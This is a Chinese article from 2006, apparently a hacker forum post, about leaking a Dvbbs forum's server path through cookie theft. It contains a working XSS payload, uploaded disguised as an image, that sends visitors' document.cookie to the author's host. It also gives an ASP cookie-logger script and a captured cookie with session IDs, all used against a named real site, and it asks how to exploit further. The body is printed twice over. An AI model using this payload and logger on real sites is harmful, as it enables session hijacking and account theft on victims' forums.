關(guān)于動(dòng)網(wǎng)的cookie瀉露站點(diǎn)絕路徑的問(wèn)題
更新時(shí)間:2006年09月08日 00:00:00 作者:
一、跨站測(cè)試
先看看我的一次跨站測(cè)試吧
我以職業(yè)欠錢的站點(diǎn)做測(cè)試吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的論談上傳兩張圖,
圖一的內(nèi)容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url為UploadFile/2005-6/200562716565777847.jpg
圖二則是偶的個(gè)人照
UploadFile/2005-6/200562716563048909.jpg
寫個(gè)盜cookie的代碼到我的空間,lcx的盜cookie代碼有問(wèn)題,所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下來(lái),點(diǎn)擊圖一,自動(dòng)轉(zhuǎn)到圖二,
二、結(jié)果分析
再到我的空間看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要嗎?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我們不難看出他的絕對(duì)路徑是e:\wwwroot\zhiyeqianqian\wwwroot
三、論談
本來(lái),最初的測(cè)試我是在測(cè)試BCT論談,成功暴出他的絕對(duì)路徑,一開始的時(shí)候,我還認(rèn)為可能又是動(dòng)網(wǎng)出洞洞了,所以又去測(cè)試了其它幾個(gè)站,測(cè)試結(jié)果是其它的站點(diǎn)并沒(méi)有暴出路徑,今天再次測(cè)試“欠我錢”的論談,卻又暴不出來(lái),查了一下代碼,和別人的代碼一個(gè)樣,根本沒(méi)什么差別。
偶想聽(tīng)聽(tīng)大家的看法,到底是哪里出了問(wèn)題,能不能深入利用~~~
先看看我的一次跨站測(cè)試吧
我以職業(yè)欠錢的站點(diǎn)做測(cè)試吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的論談上傳兩張圖,
圖一的內(nèi)容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url為UploadFile/2005-6/200562716565777847.jpg
圖二則是偶的個(gè)人照
UploadFile/2005-6/200562716563048909.jpg
寫個(gè)盜cookie的代碼到我的空間,lcx的盜cookie代碼有問(wèn)題,所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下來(lái),點(diǎn)擊圖一,自動(dòng)轉(zhuǎn)到圖二,
二、結(jié)果分析
再到我的空間看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要嗎?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我們不難看出他的絕對(duì)路徑是e:\wwwroot\zhiyeqianqian\wwwroot
三、論談
本來(lái),最初的測(cè)試我是在測(cè)試BCT論談,成功暴出他的絕對(duì)路徑,一開始的時(shí)候,我還認(rèn)為可能又是動(dòng)網(wǎng)出洞洞了,所以又去測(cè)試了其它幾個(gè)站,測(cè)試結(jié)果是其它的站點(diǎn)并沒(méi)有暴出路徑,今天再次測(cè)試“欠我錢”的論談,卻又暴不出來(lái),查了一下代碼,和別人的代碼一個(gè)樣,根本沒(méi)什么差別。
偶想聽(tīng)聽(tīng)大家的看法,到底是哪里出了問(wèn)題,能不能深入利用~~~
相關(guān)文章
最詳細(xì)的SQL注入相關(guān)的命令整理 (轉(zhuǎn))
這篇文章主要為打擊分享下一些常用SQL注入相關(guān)的命令,今天幫客戶做安裝的時(shí)候發(fā)現(xiàn)他的網(wǎng)站有很多漏洞,導(dǎo)致注入數(shù)據(jù)庫(kù)也被清空了,希望大家多關(guān)于安全2006-12-12WEB前端常見(jiàn)受攻擊方式及解決辦法總結(jié)
這篇文章主要介紹了WEB前端常見(jiàn)受攻擊方式及解決辦法總結(jié),文中講解非常細(xì)致,幫助大家更好的面對(duì)web攻擊,感興趣的朋友可以了解下2020-07-07Iptables防火墻connlimit與time模塊擴(kuò)展匹配規(guī)則
這篇文章主要為大家介紹了Iptables防火墻connlimit與time模塊擴(kuò)展匹配規(guī)則詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2022-08-08